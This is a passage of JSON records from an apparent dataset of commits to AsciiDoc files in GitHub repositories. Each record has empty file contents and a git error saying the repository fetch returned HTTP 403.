ridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,rmulvey\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,leviathan747\/bridgepoint","old_file":"doc-bridgepoint\/notes\/11396_wasl_structure\/11396_wasl_structure_ant.adoc","new_file":"doc-bridgepoint\/notes\/11396_wasl_structure\/11396_wasl_structure_ant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"684bf59122751f544ca6cfaa3f565e9f19e5bbdc","subject":"Update 2017-04-22-Speech-schedule-for-your-Google-Calendar-in-the-Pepper.adoc","message":"Update 2017-04-22-Speech-schedule-for-your-Google-Calendar-in-the-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-22-Speech-schedule-for-your-Google-Calendar-in-the-Pepper.adoc","new_file":"_posts\/2017-04-22-Speech-schedule-for-your-Google-Calendar-in-the-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8c4dd7f2397d6f302f21949327514f1d94d1e6ae","subject":"Update 2015-09-20-Inicio.adoc","message":"Update 2015-09-20-Inicio.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2015-09-20-Inicio.adoc","new_file":"_posts\/2015-09-20-Inicio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f139685060abf28d9f6ccfde30d2469046e17dd0","subject":"Update 2016-11-13-Graphs.adoc","message":"Update 2016-11-13-Graphs.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-11-13-Graphs.adoc","new_file":"_posts\/2016-11-13-Graphs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3e19a07fefcae9c8051a1a86391183157cf0e17","subject":"Update 2018-07-18-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","message":"Update 2018-07-18-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2018-07-18-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","new_file":"_posts\/2018-07-18-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc630d4125eeb1169330ab9ae3d155eb139a0c0a","subject":"Update 2016-03-26-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-26-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-26-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-26-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"18d0a0a532152e894f8c4cb87d116ba41f8fc57e","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46f485a1a60554dd6f22090dbc9d0e95a7ba08d0","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea01e8dede8fbbebda1aa898df56d455f5349ce4","subject":"add README.asciidoc","message":"add README.asciidoc\n","repos":"jasontedor\/elasticsearch-hadoop,samkohli\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop,girirajsharma\/elasticsearch-hadoop,cgvarela\/elasticsearch-hadoop,costin\/elasticsearch-hadoop,puneetjaiswal\/elasticsearch-hadoop,pranavraman\/elasticsearch-hadoop,aie108\/elasticsearch-hadoop,huangll\/elasticsearch-hadoop,holdenk\/elasticsearch-hadoop,nfouka\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,yonglehou\/elasticsearch-hadoop,trifork\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop,Gavin-Yang\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,kai5263499\/elasticsearch-hadoop,lgscofield\/elasticsearch-hadoop,sarwarbhuiyan\/elasticsearch-hadoop","old_file":"repository-hdfs\/README.asciidoc","new_file":"repository-hdfs\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pranavraman\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"15f726913ced271bff4d5d46e73d1fcbed549296","subject":"fix(README): Merge PR #131","message":"fix(README): Merge PR #131\n","repos":"anthonny\/dev.hubpress.io,alchapone\/alchapone.github.io,lametaweb\/lametaweb.github.io,TheAshwanik\/new,TheAshwanik\/new,lametaweb\/lametaweb.github.io,anthonny\/dev.hubpress.io,demo-hubpress\/demo-hubpress.github.io,alchapone\/alchapone.github.io,alchapone\/alchapone.github.io,lametaweb\/lametaweb.github.io,demo-hubpress\/demo-hubpress.github.io,TheAshwanik\/new,anthonny\/dev.hubpress.io,Git-Host\/Git-Host.io,TheAshwanik\/new,Git-Host\/Git-Host.io,demo-hubpress\/demo-hubpress.github.io,demo-hubpress\/demo-hubpress.github.io,anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io,demo-hubpress\/demo-hubpress.github.io,Git-Host\/Git-Host.io","old_file":"docs\/README.adoc","new_file":"docs\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/demo-hubpress\/demo-hubpress.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"13d779dcd4ac4aa16855a4a722bcb5dbfeb10d1b","subject":"Explain how to convert an AsciiDoc file to a reveal.js presentation.","message":"Explain how to convert an AsciiDoc file to a reveal.js presentation.\n","repos":"asciidoctor\/asciidoctor-cli.js,asciidoctor\/asciidoctor-cli.js","old_file":"docs\/manual.adoc","new_file":"docs\/manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/asciidoctor\/asciidoctor-cli.js.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d90d772203165d87c6508500072cfb5c7eda538","subject":"Added dummy 2-5 release notes file","message":"Added dummy 2-5 release notes file\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"virt\/virt-2-5-release-notes.adoc","new_file":"virt\/virt-2-5-release-notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vikram-redhat\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fb9ffeb069ddcc54fbe4e06a18a8bf6383287bce","subject":"Update 2018-06-17-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-H-S-R-P2.adoc","message":"Update 2018-06-17-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-H-S-R-P2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-17-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-H-S-R-P2.adoc","new_file":"_posts\/2018-06-17-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-H-S-R-P2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65282638526eaeb19ef4244a5320706ec851abec","subject":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","message":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"229c6d86c4c93b83e4d96c8ebacdafd567558627","subject":"Update 2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","message":"Update 2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","new_file":"_posts\/2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"55c1802ea0d7b31dbb5bf4a61d89fa8794bfced7","subject":"Polish","message":"Polish\n","repos":"spring-cloud\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,marcingrzejszczak\/jenkins-pipeline,k0chan\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,marcingrzejszczak\/jenkins-pipeline,k0chan\/spring-cloud-pipelines","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wybczu\/spring-cloud-pipelines.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d81d5d9211b3ca4c60e01943440b8a11ce05e2f5","subject":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","message":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b90fcc02101d0ce4abb7b97d82e4851f4b2969c9","subject":"Update 2015-10-23-Hubpress-Usando-o-Travis-CI-para-gerar-feed-RSS.adoc","message":"Update 2015-10-23-Hubpress-Usando-o-Travis-CI-para-gerar-feed-RSS.adoc","repos":"willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com","old_file":"_posts\/2015-10-23-Hubpress-Usando-o-Travis-CI-para-gerar-feed-RSS.adoc","new_file":"_posts\/2015-10-23-Hubpress-Usando-o-Travis-CI-para-gerar-feed-RSS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/willcrisis\/www.willcrisis.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8bacbac617000c7c40de2100739f953735fe6fc9","subject":"Update 2017-09-09-Series-that-I-want-to-hack-my-complicated-work-Part-J-I-R-A.adoc","message":"Update 2017-09-09-Series-that-I-want-to-hack-my-complicated-work-Part-J-I-R-A.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-09-Series-that-I-want-to-hack-my-complicated-work-Part-J-I-R-A.adoc","new_file":"_posts\/2017-09-09-Series-that-I-want-to-hack-my-complicated-work-Part-J-I-R-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45e98193484a93d7ce32081d3a968aca1d710873","subject":"Added lab for new-topic","message":"Added lab for new-topic\n","repos":"EMCWorld\/2015-REST,EMCWorld\/2015-REST,EMCWorld\/2015-REST,EMCWorld\/2015-REST","old_file":"lab\/new-topic.adoc","new_file":"lab\/new-topic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EMCWorld\/2015-REST.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0caf674d1ece4323c746163fe8999679cae683f1","subject":"Debezium 0.8.0.Final release announcement","message":"Debezium 0.8.0.Final release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2018-07-12-debezium-0-8-0-final-released.adoc","new_file":"blog\/2018-07-12-debezium-0-8-0-final-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"344b862e89c5f10f9a51ab62c7b0eb38cb358111","subject":"y2b create post JBL Cinema SB200 Bluetooth Soundbar Speaker Unboxing \\u0026 Overview","message":"y2b create post JBL Cinema SB200 Bluetooth Soundbar Speaker Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-01-31-JBL-Cinema-SB200-Bluetooth-Soundbar-Speaker-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2013-01-31-JBL-Cinema-SB200-Bluetooth-Soundbar-Speaker-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c4cd546ed412ecacd7aea0cfd9f19a5d2439e70","subject":"Added ohloh widget to README","message":"Added ohloh widget to README\n","repos":"oskopek\/carcv,oskopek\/carcv,oskopek\/carcv,oskopek\/carcv,sk413025\/carcv,oskopek\/carcv,sk413025\/carcv,sk413025\/carcv,oskopek\/carcv,sk413025\/carcv,sk413025\/carcv,sk413025\/carcv","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sk413025\/carcv.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2750e5db51d96f05bb129f279fd742aecd46c57c","subject":"Update 2016-01-17-demo.adoc","message":"Update 2016-01-17-demo.adoc","repos":"Cnlouds\/cnlouds.github.io,Cnlouds\/cnlouds.github.io,Cnlouds\/cnlouds.github.io","old_file":"_posts\/2016-01-17-demo.adoc","new_file":"_posts\/2016-01-17-demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Cnlouds\/cnlouds.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af739a47d0424baaa542eb188ec27eb1d4f67cb6","subject":"Update 2016-05-23-Horoshij-spravochnik-po-ASCIIDOC-AsciiDoc-cheatsheet.adoc","message":"Update 2016-05-23-Horoshij-spravochnik-po-ASCIIDOC-AsciiDoc-cheatsheet.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2016-05-23-Horoshij-spravochnik-po-ASCIIDOC-AsciiDoc-cheatsheet.adoc","new_file":"_posts\/2016-05-23-Horoshij-spravochnik-po-ASCIIDOC-AsciiDoc-cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95c42e45cc9870dfad03affbda13f06d8a7628e6","subject":"Update 2016-04-04-Sin-espias.adoc","message":"Update 2016-04-04-Sin-espias.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Sin-espias.adoc","new_file":"_posts\/2016-04-04-Sin-espias.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06ada3636cd729edfd2cbf36a2595e92b6765161","subject":"Update 2016-11-11-Pepper.adoc","message":"Update 2016-11-11-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-11-Pepper.adoc","new_file":"_posts\/2016-11-11-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"59d61b742ae94fcdf7c8a5b26cd138516b009236","subject":"Update 2018-03-24-places.adoc","message":"Update 2018-03-24-places.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-03-24-places.adoc","new_file":"_posts\/2018-03-24-places.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df8c0af11407936f8e93ce6003ec8ce3de85b6b2","subject":"Update 2018-11-13-Nuxtjs.adoc","message":"Update 2018-11-13-Nuxtjs.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-13-Nuxtjs.adoc","new_file":"_posts\/2018-11-13-Nuxtjs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25409635c6df5b7f30c3305c6db0c0ad81ec30dc","subject":"Update 2015-02-18-Freie-HTML-E-Mail-Layouts-fur-responsive-gerateunabhangige-Newsletter.adoc","message":"Update 2015-02-18-Freie-HTML-E-Mail-Layouts-fur-responsive-gerateunabhangige-Newsletter.adoc","repos":"Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de","old_file":"_posts\/2015-02-18-Freie-HTML-E-Mail-Layouts-fur-responsive-gerateunabhangige-Newsletter.adoc","new_file":"_posts\/2015-02-18-Freie-HTML-E-Mail-Layouts-fur-responsive-gerateunabhangige-Newsletter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bloggerschmidt\/bloggerschmidt.de.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c77540ffcc5898d196691ed58ccfa7e954ad677f","subject":"Update 2016-11-27-Bash-Appetizer.adoc","message":"Update 2016-11-27-Bash-Appetizer.adoc","repos":"akr-optimus\/akr-optimus.github.io,akr-optimus\/akr-optimus.github.io,akr-optimus\/akr-optimus.github.io,akr-optimus\/akr-optimus.github.io","old_file":"_posts\/2016-11-27-Bash-Appetizer.adoc","new_file":"_posts\/2016-11-27-Bash-Appetizer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/akr-optimus\/akr-optimus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0402af0c7e30bc79cd1296efa3eeef2a73dc1537","subject":"Create plugin_management.adoc","message":"Create plugin_management.adoc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/plugin_management.adoc","new_file":"userguide\/tutorials\/plugin_management.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"83e1806a568248540d12dd2c2e1a035416a8bb35","subject":"Update 2017-09-14-Otomatik-Odeme.adoc","message":"Update 2017-09-14-Otomatik-Odeme.adoc","repos":"Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io","old_file":"_posts\/2017-09-14-Otomatik-Odeme.adoc","new_file":"_posts\/2017-09-14-Otomatik-Odeme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Aferide\/Aferide.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb7e4181a32c0cdc79b4f5fab940ab4e3f8582d9","subject":"Update 2015-04-24-iOS-interview-part-3.adoc","message":"Update 2015-04-24-iOS-interview-part-3.adoc","repos":"J0HDev\/blog,J0HDev\/blog,J0HDev\/blog","old_file":"_posts\/2015-04-24-iOS-interview-part-3.adoc","new_file":"_posts\/2015-04-24-iOS-interview-part-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/J0HDev\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a841f8acbb98310ac08e64531e8c21b8f8db20c","subject":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","message":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d623842454a356a2aacb6021b6ef9b441fa8cb66","subject":"y2b create post $30,000 Headphones!?! -- Sennheiser Orpheus and HD800 (CES 2013)","message":"y2b create post $30,000 Headphones!?! -- Sennheiser Orpheus and HD800 (CES 2013)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-01-17-30000-Headphones--Sennheiser-Orpheus-and-HD800-CES-2013.adoc","new_file":"_posts\/2013-01-17-30000-Headphones--Sennheiser-Orpheus-and-HD800-CES-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34aeacec262396cbc11c0dbd72a14c2fff934970","subject":"Update 2016-03-02-Epcot-International-Flower-and-Garden-Festival-blooms-today.adoc","message":"Update 2016-03-02-Epcot-International-Flower-and-Garden-Festival-blooms-today.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-03-02-Epcot-International-Flower-and-Garden-Festival-blooms-today.adoc","new_file":"_posts\/2016-03-02-Epcot-International-Flower-and-Garden-Festival-blooms-today.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5687d3fb67d6c627ab8a2e2561246f55c55446a4","subject":"Added apoc.create.setProperty procedures to the docs","message":"Added apoc.create.setProperty procedures to the docs\n","repos":"larusba\/neo4j-apoc-procedures,inserpio\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,lilianaziolek\/neo4j-apoc-procedures","old_file":"docs\/overview.adoc","new_file":"docs\/overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/larusba\/neo4j-apoc-procedures.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"98b1fcdeb7f923ade95546491ec2b21486bc90ed","subject":"Update 2016-12-18-About-Me.adoc","message":"Update 2016-12-18-About-Me.adoc","repos":"chowwin\/chowwin.github.io,chowwin\/chowwin.github.io,chowwin\/chowwin.github.io,chowwin\/chowwin.github.io","old_file":"_posts\/2016-12-18-About-Me.adoc","new_file":"_posts\/2016-12-18-About-Me.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chowwin\/chowwin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"694d908f4e06a59ca5d0cdf1e0c303c83a7f1fe3","subject":"Update 2017-09-01-Ethereum.adoc","message":"Update 2017-09-01-Ethereum.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-01-Ethereum.adoc","new_file":"_posts\/2017-09-01-Ethereum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5319551d5b746cc7bdbe63889901600590fcd387","subject":"Update 2017-10-01-1st-post.adoc","message":"Update 2017-10-01-1st-post.adoc","repos":"ecmeyva\/ecmeyva.github.io,ecmeyva\/ecmeyva.github.io,ecmeyva\/ecmeyva.github.io,ecmeyva\/ecmeyva.github.io","old_file":"_posts\/2017-10-01-1st-post.adoc","new_file":"_posts\/2017-10-01-1st-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ecmeyva\/ecmeyva.github.io.git\/': The requested URL returned error: 